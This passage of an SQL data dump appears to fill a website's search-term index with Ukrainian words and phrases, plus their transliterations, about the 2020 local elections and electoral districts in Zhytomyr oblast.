viborakh',0,1,1.6,'G425162',1,'*'),(1560569,'informatsiya','informatsiya',0,0,0.8,'I516532',1,'*'),(1560570,'informatsiya pro','informatsiya pro',0,1,1.5333,'I51653216',1,'*'),(1560571,'informatsiya pro kilkist','informatsiya pro kilkist',0,1,1.8,'I516532162423',1,'*'),(1560572,'kilkist','kilkist',0,0,0.4667,'K423',1,'*'),(1560573,'kilkist vibortsiv','kilkist vibortsiv',0,1,1.5667,'K42316321',1,'*'),(1560574,'kilkist vibortsiv yaki','kilkist vibortsiv yaki',0,1,1.7333,'K423163212',1,'*'),(1560575,'mayut','mayut',0,0,0.3333,'M300',1,'*'),(1560576,'mayut pravo','mayut pravo',0,1,1.3667,'M3161',1,'*'),(1560577,'mayut pravo golosu','mayut pravo golosu',0,1,1.6,'M3161242',1,'*'),(1560578,'miskoji','miskoji',0,0,0.4667,'M200',4,'*'),(1560579,'miskoji silskoji','miskoji silskoji',0,1,1.5333,'M242',1,'*'),(1560580,'miskoji silskoji selishchnoji','miskoji silskoji selishchnoji',0,1,1.9667,'M2424252',1,'*'),(1560581,'mistsevi','mistsevi',0,0,0.5333,'M2321',1,'*'),(1560582,'mistsevi vibori','mistsevi vibori',0,1,1.5,'M23216',1,'*'),(1560583,'mistsevi vibori 25','mistsevi vibori 25',0,1,1.6,'M23216',1,'*'),(1560584,'na','na',0,0,0.1333,'N000',8,'*'),(1560585,'na viborakh','na viborakh',0,1,1.3667,'N162',1,'*'),(1560586,'na viborakh deputativ','na viborakh deputativ',0,1,1.7,'N1623131',1,'*'),(1560587,'pravo','pravo',0,0,0.3333,'P610',1,'*'),(1560588,'pravo golosu','pravo golosu',0,1,1.4,'P61242',1,'*'),(1560589,'pravo golosu na','pravo golosu na',0,1,1.5,'P612425',1,'*'),(1560590,'pro','pro',0,0,0.2,'P600',1,'*'),(1560591,'pro kilkist','pro kilkist',0,1,1.3667,'P62423',1,'*'),(1560592,'pro kilkist vibortsiv','pro kilkist vibortsiv',0,1,1.7,'P6242316321',1,'*'),(1560593,'pro viborchu','pro viborchu',0,1,1.4,'P6162',1,'*'),(1560594,'pro viborchu sistemu','pro viborchu sistemu',0,1,1.6667,'P616235',1,'*'),(1560595,'provodyatsya','provodyatsya',0,0,0.8,'P6132',1,'*'),(1560596,'provodyatsya vidpovidni','provodyatsya vidpovidni',0,1,1.7667,'P613213135',1,'*'),(1560597,'provodyatsya vidpovidni mistsevi','provodyatsya vidpovidni mistsevi',0,1,2,'P6132131352321',1,'*'),(1560598,'radi','radi',0,0,0.2667,'R300',5,'*'),(1560599,'radi ta','radi ta',0,1,1.2333,'R300',1,'*'),(1560600,'radi ta pro','radi ta pro',0,1,1.3667,'R316',1,'*'),(1560601,'roku za','roku za',0,1,1.2333,'R200',1,'*'),(1560602,'roku za danimi','roku za danimi',0,1,1.4667,'R235',1,'*'),(1560603,'selishchnoji','selishchnoji',0,0,0.8,'S4252',2,'*'),(1560604,'selishchnoji radi','selishchnoji radi',0,1,1.5667,'S425263',2,'*'),(1560605,'selishchnoji radi ta','selishchnoji radi ta',0,1,1.6667,'S425263',1,'*'),(1560606,'silskoji','silskoji',0,0,0.5333,'S420',1,'*'),(1560607,'silskoji selishchnoji','silskoji selishchnoji',0,1,1.7,'S424252',1,'*'),(1560608,'silskoji selishchnoji radi','silskoji selishchnoji radi',0,1,1.8667,'S42425263',1,'*'),(1560609,'sistemu','sistemu',0,0,0.4667,'S350',1,'*'),(1560610,'sistemu za','sistemu za',0,1,1.3333,'S352',1,'*'),(1560611,'sistemu za yakoyu','sistemu za yakoyu',0,1,1.5667,'S352',1,'*'),(1560612,'ta pro','ta pro',0,1,1.2,'T160',1,'*'),(1560613,'ta pro viborchu','ta pro viborchu',0,1,1.5,'T16162',1,'*'),(1560614,'tsvk','tsvk',0,0,0.2667,'T212',2,'*'),(1560615,'viborakh','viborakh',0,0,0.5333,'V620',2,'*'),(1560616,'viborakh deputativ','viborakh deputativ',0,1,1.6,'V623131',1,'*'),(1560617,'viborakh deputativ miskoji','viborakh deputativ miskoji',0,1,1.8667,'V62313152',1,'*'),(1560618,'viborchu','viborchu',0,0,0.5333,'V620',1,'*'),(1560619,'viborchu sistemu','viborchu sistemu',0,1,1.5333,'V6235',1,'*'),(1560620,'viborchu sistemu za','viborchu sistemu za',0,1,1.6333,'V62352',1,'*'),(1560621,'vibori','vibori',0,0,0.4,'V600',1,'*'),(1560622,'vibori 25','vibori 25',0,1,1.3,'V600',1,'*'),(1560623,'vibori 25 zhovtnya','vibori 25 zhovtnya',0,1,1.6,'V62135',1,'*'),(1560624,'vibortsiv','vibortsiv',0,0,0.6,'V6321',1,'*'),(1560625,'vibortsiv yaki','vibortsiv yaki',0,1,1.4667,'V63212',1,'*'),(1560626,'vibortsiv yaki mayut','vibortsiv yaki mayut',0,1,1.6667,'V6321253',1,'*'),(1560627,'vidpovidni','vidpovidni',0,0,0.6667,'V3135',1,'*'),(1560628,'vidpovidni mistsevi','vidpovidni mistsevi',0,1,1.6333,'V31352321',1,'*'),(1560629,'vidpovidni mistsevi vibori','vidpovidni mistsevi vibori',0,1,1.8667,'V313523216',1,'*'),(1560630,'yaki','yaki',0,0,0.2667,'Y200',2,'*'),(1560631,'yaki mayut','yaki mayut',0,1,1.3333,'Y253',1,'*'),(1560632,'yaki mayut pravo','yaki mayut pravo',0,1,1.5333,'Y253161',1,'*'),(1560633,'yakoyu','yakoyu',0,0,0.4,'Y200',1,'*'),(1560634,'yakoyu provodyatsya','yakoyu provodyatsya',0,1,1.6333,'Y216132',1,'*'),(1560635,'yakoyu provodyatsya vidpovidni','yakoyu provodyatsya vidpovidni',0,1,2,'Y21613213135',1,'*'),(1560636,'za danimi','za danimi',0,1,1.3,'Z350',1,'*'),(1560637,'za danimi tsvk','za danimi tsvk',0,1,1.4667,'Z353212',1,'*'),(1560638,'za yakoyu','za yakoyu',0,1,1.3,'Z000',1,'*'),(1560639,'za yakoyu provodyatsya','za yakoyu provodyatsya',0,1,1.7333,'Z16132',1,'*'),(1560640,'zhovtnya','zhovtnya',0,0,0.5333,'Z135',4,'*'),(1560641,'zhovtnya 2020','zhovtnya 2020',0,1,1.4333,'Z135',1,'*'),(1560642,'zhovtnya 2020 roku','zhovtnya 2020 roku',0,1,1.6,'Z13562',1,'*'),(1560643,'інформація про','інформація про',0,1,1.4667,'і000',1,'*'),(1560644,'інформація про кількість','інформація про кількість',0,1,1.8,'і000',1,'*'),(1560645,'відповідні','відповідні',0,0,0.6667,'в000',1,'*'),(1560646,'відповідні місцеві','відповідні місцеві',0,1,1.6,'в000',1,'*'),(1560647,'відповідні місцеві вибори','відповідні місцеві вибори',0,1,1.8333,'в000',1,'*'),(1560648,'виборах','виборах',0,0,0.4667,'в000',3,'*'),(1560649,'виборах депутатів','виборах депутатів',0,1,1.5667,'в000',1,'*'),(1560650,'виборах депутатів міської','виборах депутатів міської',0,1,1.8333,'в000',1,'*'),(1560651,'вибори','вибори',0,0,0.4,'в000',2,'*'),(1560652,'вибори 25','вибори 25',0,1,1.3,'в000',1,'*'),(1560653,'вибори 25 жовтня','вибори 25 жовтня',0,1,1.5333,'в000',1,'*'),(1560654,'виборців','виборців',0,0,0.5333,'в000',2,'*'),(1560655,'виборців які','виборців які',0,1,1.4,'в000',1,'*'),(1560656,'виборців які мають','виборців які мають',0,1,1.6,'в000',1,'*'),(1560657,'виборчу','виборчу',0,0,0.4667,'в000',1,'*'),(1560658,'виборчу систему','виборчу систему',0,1,1.5,'в000',1,'*'),(1560659,'виборчу систему за','виборчу систему за',0,1,1.6,'в000',1,'*'),(1560660,'голосу','голосу',0,0,0.4,'г000',1,'*'),(1560661,'голосу на','голосу на',0,1,1.3,'г000',1,'*'),(1560662,'голосу на виборах','голосу на виборах',0,1,1.5667,'г000',1,'*'),(1560663,'даними цвк','даними цвк',0,1,1.3333,'д000',1,'*'),(1560664,'депутатів','депутатів',0,0,0.6,'д000',4,'*'),(1560665,'депутатів міської','депутатів міської',0,1,1.5667,'д000',1,'*'),(1560666,'депутатів міської сільської','депутатів міської сільської',0,1,1.9,'д000',1,'*'),(1560667,'жовтня','жовтня',0,0,0.4,'ж000',6,'*'),(1560668,'жовтня 2020','жовтня 2020',0,1,1.3667,'ж000',3,'*'),(1560669,'жовтня 2020 року','жовтня 2020 року',0,1,1.5333,'ж000',3,'*'),(1560670,'за даними цвк','за даними цвк',0,1,1.4333,'з000',1,'*'),(1560671,'за якою','за якою',0,1,1.2333,'з000',1,'*'),(1560672,'за якою проводяться','за якою проводяться',0,1,1.6333,'з000',1,'*'),(1560673,'кількість виборців','кількість виборців',0,1,1.6,'к000',2,'*'),(1560674,'кількість виборців які','кількість виборців які',0,1,1.7333,'к000',1,'*'),(1560675,'місцеві','місцеві',0,0,0.4667,'м000',1,'*'),(1560676,'місцеві вибори','місцеві вибори',0,1,1.4667,'м000',1,'*'),(1560677,'місцеві вибори 25','місцеві вибори 25',0,1,1.5667,'м000',1,'*'),(1560678,'міської','міської',0,0,0.4667,'м000',5,'*'),(1560679,'міської сільської','міської сільської',0,1,1.5667,'м000',1,'*'),(1560680,'міської сільської селищної','міської сільської селищної',0,1,1.8667,'м000',1,'*'),(1560681,'мають','мають',0,0,0.3333,'м000',3,'*'),(1560682,'мають право','мають право',0,1,1.3667,'м000',1,'*'),(1560683,'мають право голосу','мають право голосу',0,1,1.6,'м000',1,'*'),(1560684,'на виборах','на виборах',0,1,1.3333,'н000',1,'*'),(1560685,'на виборах депутатів','на виборах депутатів',0,1,1.6667,'н000',1,'*'),(1560686,'право','право',0,0,0.3333,'п000',2,'*'),(1560687,'право голосу','право голосу',0,1,1.4,'п000',1,'*'),(1560688,'право голосу на','право голосу на',0,1,1.5,'п000',1,'*'),(1560689,'про виборчу','про виборчу',0,1,1.3667,'п000',1,'*'),(1560690,'про виборчу систему','про виборчу систему',0,1,1.6333,'п000',1,'*'),(1560691,'про кількість','про кількість',0,1,1.4333,'п000',1,'*'),(1560692,'про кількість виборців','про кількість виборців',0,1,1.7333,'п000',1,'*'),(1560693,'проводяться','проводяться',0,0,0.7333,'п000',1,'*'),(1560694,'проводяться відповідні','проводяться відповідні',0,1,1.7333,'п000',1,'*'),(1560695,'проводяться відповідні місцеві','проводяться відповідні місцеві',0,1,2,'п000',1,'*'),(1560696,'ради','ради',0,0,0.2667,'р000',7,'*'),(1560697,'ради та','ради та',0,1,1.2333,'р000',2,'*'),(1560698,'ради та про','ради та про',0,1,1.3667,'р000',1,'*'),(1560699,'року за','року за',0,1,1.2333,'р000',2,'*'),(1560700,'року за даними','року за даними',0,1,1.4667,'р000',1,'*'),(1560701,'сільської','сільської',0,0,0.6,'с000',2,'*'),(1560702,'сільської селищної','сільської селищної',0,1,1.6,'с000',1,'*'),(1560703,'сільської селищної ради','сільської селищної ради',0,1,1.7667,'с000',1,'*'),(1560704,'селищної','селищної',0,0,0.5333,'с000',2,'*'),(1560705,'селищної ради','селищної ради',0,1,1.4333,'с000',2,'*'),(1560706,'селищної ради та','селищної ради та',0,1,1.5333,'с000',1,'*'),(1560707,'систему за','систему за',0,1,1.3333,'с000',1,'*'),(1560708,'систему за якою','систему за якою',0,1,1.5,'с000',1,'*'),(1560709,'та про','та про',0,1,1.2,'т000',1,'*'),(1560710,'та про виборчу','та про виборчу',0,1,1.4667,'т000',1,'*'),(1560711,'цвк','цвк',0,0,0.2,'ц000',2,'*'),(1560712,'які мають','які мають',0,1,1.3,'я000',1,'*'),(1560713,'які мають право','які мають право',0,1,1.5,'я000',1,'*'),(1560714,'якою','якою',0,0,0.2667,'я000',1,'*'),(1560715,'якою проводяться','якою проводяться',0,1,1.5333,'я000',1,'*'),(1560716,'якою проводяться відповідні','якою проводяться відповідні',0,1,1.9,'я000',1,'*'),(1562853,'059','059',0,0,0.3,'',1,'*'),(1562854,'059 округ','059 округ',0,1,1.3,'о000',1,'*'),(1562855,'059 округ 8','059 округ 8',0,1,1.3667,'о000',1,'*'),(1562856,'078','078',0,0,0.3,'',1,'*'),(1562857,'078 округ','078 округ',0,1,1.3,'о000',1,'*'),(1562858,'078 округ 3','078 округ 3',0,1,1.3667,'о000',1,'*'),(1562859,'1 житомирська','1 житомирська',0,1,1.4333,'ж000',1,'*'),(1562860,'1 житомирська отг','1 житомирська отг',0,1,1.5667,'ж000',1,'*'),(1562861,'116','116',0,0,0.3,'',1,'*'),(1562862,'116 418','116 418',0,1,1.2333,'',1,'*'),(1562863,'116 418 округ','116 418 округ',0,1,1.4333,'о000',1,'*'),(1562864,'130','130',0,0,0.3,'',1,'*'),(1562865,'130 654','130 654',0,1,1.2333,'',1,'*'),(1562866,'130 654 округ','130 654 округ',0,1,1.4333,'о000',1,'*'),(1562867,'131 204','131 204',0,1,1.2333,'',1,'*'),(1562868,'131 204 округ','131 204 округ',0,1,1.4333,'о000',1,'*'),(1562869,'131 334','131 334',0,1,1.2333,'',1,'*'),(1562870,'143','143',0,0,0.3,'',1,'*'),(1562871,'143 444','143 444',0,1,1.2333,'',1,'*'),(1562872,'143 444 округ','143 444 округ',0,1,1.4333,'о000',1,'*'),(1562873,'159','159',0,0,0.3,'',1,'*'),(1562874,'159 548','159 548',0,1,1.2333,'',1,'*'),(1562875,'159 548 округ','159 548 округ',0,1,1.4333,'о000',1,'*'),(1562876,'2 житомирська','2 житомирська',0,1,1.4333,'ж000',1,'*'),(1562877,'2 житомирська отг','2 житомирська отг',0,1,1.5667,'ж000',1,'*'),(1562878,'2 селищні','2 селищні',0,1,1.3,'с000',1,'*'),(1562879,'2 селищні і','2 селищні і',0,1,1.3667,'с000',1,'*'),(1562880,'2 селищні отг','2 селищні отг',0,1,1.4333,'с000',1,'*'),(1562881,'2020 року зокрема','2020 року зокрема',0,1,1.5667,'р000',1,'*'),(1562882,'204','204',0,0,0.3,'',1,'*'),(1562883,'204 округ','204 округ',0,1,1.3,'о000',1,'*'),(1562884,'204 округ 4','204 округ 4',0,1,1.3667,'о000',1,'*'),(1562885,'2469','2469',0,0,0.4,'',1,'*'),(1562886,'3 радомишльська','3 радомишльська',0,1,1.5,'р000',1,'*'),(1562887,'3 радомишльська міська','3 радомишльська міська',0,1,1.7333,'р000',1,'*'),(1562888,'3 селищні','3 селищні',0,1,1.3,'с000',1,'*'),(1562889,'3 селищні і','3 селищні і',0,1,1.3667,'с000',1,'*'),(1562890,'334','334',0,0,0.3,'',1,'*'),(1562891,'4 чуднівська','4 чуднівська',0,1,1.4,'ч000',1,'*'),(1562892,'4 чуднівська та','4 чуднівська та',0,1,1.5,'ч000',1,'*'),(1562893,'418','418',0,0,0.3,'',1,'*'),(1562894,'418 округ','418 округ',0,1,1.3,'о000',1,'*'),(1562895,'418 округ 2','418 округ 2',0,1,1.3667,'о000',1,'*'),(1562896,'42','42',0,0,0.2,'',1,'*'),(1562897,'42 059','42 059',0,1,1.2,'',1,'*'),(1562898,'42 059 округ','42 059 округ',0,1,1.4,'о000',1,'*'),(1562899,'444','444',0,0,0.3,'',1,'*'),(1562900,'444 округ','444 округ',0,1,1.3,'о000',1,'*'),(1562901,'444 округ 5','444 округ 5',0,1,1.3667,'о000',1,'*'),(1562902,'5 вересня','5 вересня',0,1,1.3,'в000',1,'*'),(1562903,'5 вересня 2020','5 вересня 2020',0,1,1.4667,'в000',1,'*'),(1562904,'5 новоград-волинська','5 новоград-волинська',0,1,1.6667,'н000',1,'*'),(1562905,'5 новоград-волинська і','5 новоград-волинська і',0,1,1.7333,'н000',1,'*'),(1562906,'5 сільських','5 сільських',0,1,1.3667,'с000',1,'*'),(1562907,'5 сільських отг','5 сільських отг',0,1,1.5,'с000',1,'*'),(1562908,'5 селищних','5 селищних',0,1,1.3333,'с000',1,'*'),(1562909,'5 селищних та','5 селищних та',0,1,1.4333,'с000',1,'*'),(1562910,'548','548',0,0,0.3,'',1,'*'),(1562911,'548 округ','548 округ',0,1,1.3,'о000',1,'*'),(1562912,'548 округ 7','548 округ 7',0,1,1.3667,'о000',1,'*'),(1562913,'6','6',0,0,0.1,'',4,'*'),(1562914,'6 коростенська','6 коростенська',0,1,1.4667,'к000',1,'*'),(1562915,'6 коростенська олевська','6 коростенська олевська',0,1,1.7667,'к000',1,'*'),(1562916,'654','654',0,0,0.3,'',1,'*'),(1562917,'654 округ','654 округ',0,1,1.3,'о000',1,'*'),(1562918,'654 округ 6','654 округ 6',0,1,1.3667,'о000',1,'*'),(1562919,'7 малинська','7 малинська',0,1,1.3667,'м000',1,'*'),(1562920,'7 малинська міська','7 малинська міська',0,1,1.6,'м000',1,'*'),(1562921,'7 сільських','7 сільських',0,1,1.3667,'с000',1,'*'),(1562922,'7 сільських отг','7 сільських отг',0,1,1.5,'с000',1,'*'),(1562923,'7 селищних','7 селищних',0,1,1.3333,'с000',1,'*'),(1562924,'7 селищних та','7 селищних та',0,1,1.4333,'с000',1,'*'),(1562925,'8 viborchikh','8 viborchikh',0,1,1.4,'V620',1,'*'),(1562926,'8 viborchikh okrugiv','8 viborchikh okrugiv',0,1,1.6667,'V62621',1,'*'),(1562927,'8 бердичівська','8 бердичівська',0,1,1.4667,'б000',1,'*'),(1562928,'8 бердичівська та','8 бердичівська та',0,1,1.5667,'б000',1,'*'),(1562929,'8 виборчих','8 виборчих',0,1,1.3333,'в000',1,'*'),(1562930,'8 виборчих округів','8 виборчих округів',0,1,1.6,'в000',1,'*'),(1562931,'8 сільських','8 сільських',0,1,1.3667,'с000',1,'*'),(1562932,'8 сільських отг','8 сільських отг',0,1,1.5,'с000',1,'*'),(1562933,'92','92',0,0,0.2,'',1,'*'),(1562934,'92 078','92 078',0,1,1.2,'',1,'*'),(1562935,'92 078 округ','92 078 округ',0,1,1.4,'о000',1,'*'),(1562936,'oblasti','oblasti',0,0,0.4667,'O1423',6,'*'),(1562937,'oblasti utvoreno','oblasti utvoreno',0,1,1.5333,'O1423165',1,'*'),(1562938,'oblasti utvoreno 8','oblasti utvoreno 8',0,1,1.6,'O1423165',1,'*'),(1562939,'okrugiv','okrugiv',0,0,0.4667,'O2621',1,'*'),(1562940,'utvoreno','utvoreno',0,0,0.5333,'U3165',1,'*'),(1562941,'utvoreno 8','utvoreno 8',0,1,1.3333,'U3165',1,'*'),(1562942,'utvoreno 8 viborchikh','utvoreno 8 viborchikh',0,1,1.7,'U3165162',1,'*'),(1562943,'v zhitomirskij','v zhitomirskij',0,1,1.4667,'V23562',1,'*'),(1562944,'v zhitomirskij oblasti','v zhitomirskij oblasti',0,1,1.7333,'V235621423',1,'*'),(1562945,'viborchikh','viborchikh',0,0,0.6667,'V620',1,'*'),(1562946,'viborchikh okrugiv','viborchikh okrugiv',0,1,1.6,'V62621',1,'*'),(1562947,'zhitomirskij','zhitomirskij',0,0,0.8,'Z3562',1,'*'),(1562948,'zhitomirskij oblasti','zhitomirskij oblasti',0,1,1.6667,'Z35621423',1,'*'),(1562949,'zhitomirskij oblasti utvoreno','zhitomirskij oblasti utvoreno',0,1,1.9667,'Z35621423165',1,'*'),(1562950,'і 5','і 5',0,1,1.1,'і000',1,'*'),(1562951,'і 5 сільських','і 5 сільських',0,1,1.4333,'і000',1,'*'),(1562952,'і 5 селищних','і 5 селищних',0,1,1.4,'і000',1,'*'),(1562953,'і 7','і 7',0,1,1.1,'і000',1,'*'),(1562954,'і 7 сільських','і 7 сільських',0,1,1.4333,'і000',1,'*'),(1562955,'і баранівська','і баранівська',0,1,1.4333,'і000',1,'*'),(1562956,'і баранівська міські','і баранівська міські',0,1,1.6667,'і000',1,'*'),(1562957,'андрушівська','андрушівська',0,0,0.8,'а000',1,'*'),(1562958,'андрушівська міські','андрушівська міські',0,1,1.6333,'а000',1,'*'),(1562959,'андрушівська міські ради','андрушівська міські ради',0,1,1.8,'а000',1,'*'),(1562960,'баранівська','баранівська',0,0,0.7333,'б000',1,'*'),(1562961,'баранівська міські','баранівська міські',0,1,1.6,'б000',1,'*'),(1562962,'баранівська міські ради','баранівська міські ради',0,1,1.7667,'б000',1,'*'),(1562963,'бердичівська','бердичівська',0,0,0.8,'б000',1,'*'),(1562964,'бердичівська та','бердичівська та',0,1,1.5,'б000',1,'*'),(1562965,'бердичівська та андрушівська','бердичівська та андрушівська',0,1,1.9333,'б000',1,'*'),(1562966,'богунський','богунський',0,0,0.6667,'б000',1,'*'),(1562967,'богунський район','богунський район',0,1,1.5333,'б000',1,'*'),(1562968,'богунський район орієнтована','богунський район орієнтована',0,1,1.9333,'б000',1,'*'),(1562969,'в житомирській','в житомирській',0,1,1.4667,'в000',1,'*'),(1562970,'в житомирській області','в житомирській області',0,1,1.7333,'в000',1,'*'),(1562971,'відповідну','відповідну',0,0,0.6667,'в000',2,'*'),(1562972,'відповідну постанову','відповідну постанову',0,1,1.6667,'в000',1,'*'),(1562973,'відповідну постанову прийняла','відповідну постанову прийняла',0,1,1.9667,'в000',1,'*'),(1562974,'вереси','вереси',0,0,0.4,'в000',1,'*'),(1562975,'вереси орієнтована','вереси орієнтована',0,1,1.6,'в000',1,'*'),(1562976,'вереси орієнтована кількість','вереси орієнтована кількість',0,1,1.9333,'в000',1,'*'),(1562977,'вересня','вересня',0,0,0.4667,'в000',3,'*'),(1562978,'вересня 2020','вересня 2020',0,1,1.4,'в000',1,'*'),(1562979,'вересня 2020 року','вересня 2020 року',0,1,1.5667,'в000',1,'*'),(1562980,'виборців 116','виборців 116',0,1,1.4,'в000',1,'*'),(1562981,'виборців 116 418','виборців 116 418',0,1,1.5333,'в000',1,'*'),(1562982,'виборців 130','виборців 130',0,1,1.4,'в000',1,'*'),(1562983,'виборців 130 654','виборців 130 654',0,1,1.5333,'в000',1,'*'),(1562984,'виборців 131','виборців 131',0,1,1.4,'в000',1,'*'),(1562985,'виборців 131 204','виборців 131 204',0,1,1.5333,'в000',1,'*'),(1562986,'виборців 131 334','виборців 131 334',0,1,1.5333,'в000',1,'*'),(1562987,'виборців 143','виборців 143',0,1,1.4,'в000',1,'*'),(1562988,'виборців 143 444','виборців 143 444',0,1,1.5333,'в000',1,'*'),(1562989,'виборців 159','виборців 159',0,1,1.4,'в000',1,'*'),(1562990,'виборців 159 548','виборців 159 548',0,1,1.5333,'в000',1,'*'),(1562991,'виборців 42','виборців 42',0,1,1.3667,'в000',1,'*'),(1562992,'виборців 42 059','виборців 42 059',0,1,1.5,'в000',1,'*'),(1562993,'виборців 92','виборців 92',0,1,1.3667,'в000',1,'*'),(1562994,'виборців 92 078','виборців 92 078',0,1,1.5,'в000',1,'*'),(1562995,'виборча','виборча',0,0,0.4667,'в000',1,'*'),(1562996,'виборча комісія','виборча комісія',0,1,1.5,'в000',1,'*'),(1562997,'виборча комісія 5','виборча комісія 5',0,1,1.5667,'в000',1,'*'),(1562998,'виборчих','виборчих',0,0,0.5333,'в000',1,'*'),(1562999,'виборчих округів','виборчих округів',0,1,1.5333,'в000',1,'*'),(1563000,'виборчих округів відповідну','виборчих округів відповідну',0,1,1.9,'в000',1,'*'),(1563001,'житомирській','житомирській',0,0,0.8,'ж000',1,'*'),(1563002,'житомирській області','житомирській області',0,1,1.6667,'ж000',1,'*'),(1563003,'житомирській області утворено','житомирській області утворено',0,1,1.9667,'ж000',1,'*'),(1563004,'житомирська','житомирська',0,0,0.7333,'ж000',5,'*'),(1563005,'житомирська отг','житомирська отг',0,1,1.5,'ж000',1,'*'),(1563006,'житомирська отг богунський','житомирська отг богунський',0,1,1.8667,'ж000',1,'*'),(1563007,'житомирська отг корольовський','житомирська отг корольовський',0,1,1.9667,'ж000',1,'*'),(1563008,'зокрема','зокрема',0,0,0.4667,'з000',1,'*'),(1563009,'зокрема округ','зокрема округ',0,1,1.4333,'з000',1,'*'),(1563010,'зокрема округ 1','зокрема округ 1',0,1,1.5,'з000',1,'*'),(1563011,'кількість виборців 116','кількість виборців 116',0,1,1.7333,'к000',1,'*'),(1563012,'кількість виборців 130','кількість виборців 130',0,1,1.7333,'к000',1,'*'),(1563013,'кількість виборців 131','кількість виборців 131',0,1,1.7333,'к000',1,'*'),(1563014,'кількість виборців 143','кількість виборців 143',0,1,1.7333,'к000',1,'*'),(1563015,'кількість виборців 159','кількість виборців 159',0,1,1.7333,'к000',1,'*'),(1563016,'кількість виборців 42','кількість виборців 42',0,1,1.7,'к000',1,'*'),(1563017,'кількість виборців 92','кількість виборців 92',0,1,1.7,'к000',1,'*'),(1563018,'комісія','комісія',0,0,0.4667,'к000',1,'*'),(1563019,'комісія 5','комісія 5',0,1,1.3,'к000',1,'*'),(1563020,'комісія 5 вересня','комісія 5 вересня',0,1,1.5667,'к000',1,'*'),(1563021,'корольовський','корольовський',0,0,0.8667,'к000',1,'*'),(1563022,'корольовський район','корольовський район',0,1,1.6333,'к000',1,'*'),(1563023,'корольовський район с','корольовський район с',0,1,1.7,'к000',1,'*'),(1563024,'коростенська','коростенська',0,0,0.8,'к000',1,'*'),(1563025,'коростенська олевська','коростенська олевська',0,1,1.7,'к000',1,'*'),(1563026,'коростенська олевська та','коростенська олевська та',0,1,1.8,'к000',1,'*'),(1563027,'коростишівська','коростишівська',0,0,0.9333,'к000',1,'*'),(1563028,'коростишівська міські','коростишівська міські',0,1,1.7,'к000',1,'*'),(1563029,'коростишівська міські ради','коростишівська міські ради',0,1,1.8667,'к000',1,'*'),(1563030,'міські','міські',0,0,0.4,'м000',1,'*'),(1563031,'міські ради','міські ради',0,1,1.3667,'м000',1,'*'),(1563032,'міські ради і','міські ради і',0,1,1.4333,'м000',1,'*'),(1563033,'міські ради та','міські ради та',0,1,1.4667,'м000',1,'*'),(1563034,'міська','міська',0,0,0.4,'м000',2,'*'),(1563035,'міська рада','міська рада',0,1,1.3667,'м000',2,'*'),(1563036,'міська рада та','міська рада та',0,1,1.4667,'м000',1,'*'),(1563037,'малинська','малинська',0,0,0.6,'м000',2,'*'),(1563038,'малинська міська','малинська міська',0,1,1.5333,'м000',2,'*'),(1563039,'малинська міська рада','малинська міська рада',0,1,1.7,'м000',2,'*'),(1563040,'новоград-волинська','новоград-волинська',0,0,1,'н000',1,'*'),(1563041,'новоград-волинська і','новоград-волинська і',0,1,1.6667,'н000',1,'*'),(1563042,'новоград-волинська і баранівська','новоград-волинська і баранівська',0,1,2,'н000',1,'*'),(1563043,'обласна','обласна',0,0,0.4667,'о000',1,'*'),(1563044,'обласна виборча','обласна виборча',0,1,1.5,'о000',1,'*'),(1563045,'обласна виборча комісія','обласна виборча комісія',0,1,1.7667,'о000',1,'*'),(1563046,'області','області',0,0,0.4667,'о000',9,'*'),(1563047,'області утворено','області утворено',0,1,1.5333,'о000',1,'*'),(1563048,'області утворено 8','області утворено 8',0,1,1.6,'о000',1,'*'),(1563049,'овруцькі','овруцькі',0,0,0.5333,'о000',1,'*'),(1563050,'овруцькі міські','овруцькі міські',0,1,1.5,'о000',1,'*'),(1563051,'овруцькі міські ради','овруцькі міські ради',0,1,1.6667,'о000',1,'*'),(1563052,'округ','округ',0,0,0.3333,'о000',3,'*'),(1563053,'округ 1','округ 1',0,1,1.2333,'о000',2,'*'),(1563054,'округ 1 житомирська','округ 1 житомирська',0,1,1.6333,'о000',1,'*'),(1563055,'округ 2','округ 2',0,1,1.2333,'о000',2,'*'),(1563056,'округ 2 житомирська','округ 2 житомирська',0,1,1.6333,'о000',1,'*'),(1563057,'округ 3','округ 3',0,1,1.2333,'о000',2,'*'),(1563058,'округ 3 радомишльська','округ 3 радомишльська',0,1,1.7,'о000',1,'*'),(1563059,'округ 4','округ 4',0,1,1.2333,'о000',2,'*'),(1563060,'округ 4 чуднівська','округ 4 чуднівська',0,1,1.6,'о000',1,'*'),(1563061,'округ 5','округ 5',0,1,1.2333,'о000',1,'*'),(1563062,'округ 5 новоград-волинська','округ 5 новоград-волинська',0,1,1.8667,'о000',1,'*'),(1563063,'округ 6','округ 6',0,1,1.2333,'о000',1,'*'),(1563064,'округ 6 коростенська','округ 6 коростенська',0,1,1.6667,'о000',1,'*'),(1563065,'округ 7','округ 7',0,1,1.2333,'о000',1,'*'),(1563066,'округ 7 малинська','округ 7 малинська',0,1,1.5667,'о000',1,'*'),(1563067,'округ 8','округ 8',0,1,1.2333,'о000',1,'*'),(1563068,'округ 8 бердичівська','округ 8 бердичівська',0,1,1.6667,'о000',1,'*'),(1563069,'округів','округів',0,0,0.4667,'о000',1,'*'),(1563070,'округів відповідну','округів відповідну',0,1,1.6,'о000',1,'*'),(1563071,'округів відповідну постанову','округів відповідну постанову',0,1,1.9333,'о000',1,'*'),(1563072,'олевська','олевська',0,0,0.5333,'о000',1,'*'),(1563073,'олевська та','олевська та',0,1,1.3667,'о000',1,'*'),(1563074,'олевська та овруцькі','олевська та овруцькі',0,1,1.6667,'о000',1,'*'),(1563075,'орієнтована','орієнтована',0,0,0.7333,'о000',1,'*'),(1563076,'орієнтована кількість','орієнтована кількість',0,1,1.7,'о000',1,'*'),(1563077,'орієнтована кількість виборців','орієнтована кількість виборців',0,1,2,'о000',1,'*'),(1563078,'отг богунський','отг богунський',0,1,1.4667,'о000',1,'*'),(1563079,'отг богунський район','отг богунський район',0,1,1.6667,'о000',1,'*'),(1563080,'отг корольовський','отг корольовський',0,1,1.5667,'о000',1,'*'),(1563081,'отг корольовський район','отг корольовський район',0,1,1.7667,'о000',1,'*'),(1563082,'отг орієнтована','отг орієнтована',0,1,1.5,'о000',1,'*'),(1563083,'отг орієнтована кількість','отг орієнтована кількість',0,1,1.8333,'о000',1,'*'),(1563084,'постанову','постанову',0,0,0.6,'п000',1,'*'),(1563085,'постанову прийняла','постанову прийняла',0,1,1.6,'п000',1,'*'),(1563086,'постанову прийняла обласна','постанову прийняла обласна',0,1,1.8667,'п000',1,'*'),(1563087,'прийняла','прийняла',0,0,0.5333,'п000',1,'*'),(1563088,'прийняла обласна','прийняла 